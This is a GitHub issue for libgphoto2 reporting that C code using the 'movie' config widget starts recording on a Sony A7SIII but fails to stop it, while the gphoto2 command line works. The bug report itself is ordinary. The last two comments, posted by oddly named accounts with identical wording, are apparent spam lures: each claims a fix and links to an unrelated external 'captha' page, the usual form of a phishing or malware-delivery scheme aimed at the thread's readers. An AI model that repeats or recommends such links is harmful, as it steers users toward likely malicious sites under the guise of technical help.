gphoto/libgphoto2 #1097: Sony A7SIII 不能停止录制

xujinbook, 2025-03-05:
**Describe the bug**
基于最新版本的 2.5.31 libgphoto2，发现采用如下代码能够实现相机录制但是不能停止录制
     CameraWidget *movieWidget = nullptr;
    ret = gp_widget_get_child_by_name(config, "movie", &movieWidget );
    if (ret == GP_OK && movieWidget ) {
        gp_widget_set_value(movieWidget , "1");                                     // OK,  可以正常开启录制
        gp_camera_set_config(camera, config, context);
        sleep(3);
        gp_widget_set_value(movieWidget , "0");                                    // NG, 不能停止录制
        gp_camera_set_config(camera, config, context);
    }

但是发现 gphoto2 命令是 ok 的;
gphoto2 --set-config movie=1     // ok
gphoto2 --set-config movie=0     // ok

A clear and concise description of what the bug is.

**Name the camera**
Camera name as shown by gphoto2 --auto-detect or USB IDs

**libgphoto2 and gphoto2 version**
output of: gphoto2 --version
version  2.5.31 and the latest

**To Reproduce**
Steps to reproduce the behavior:

When reproducing with the commandline tool, attach debugout using  --debug --debug-logfile=debug.log   if considered useful.

DomesticFemBoy, 2025-04-12:
This fix in another issue and it might help you [click](https://newrides.es/captha/)

Domestos2281337, 2025-04-12:
This fix in another issue and it might help you [click](https://newrides.es/captha/)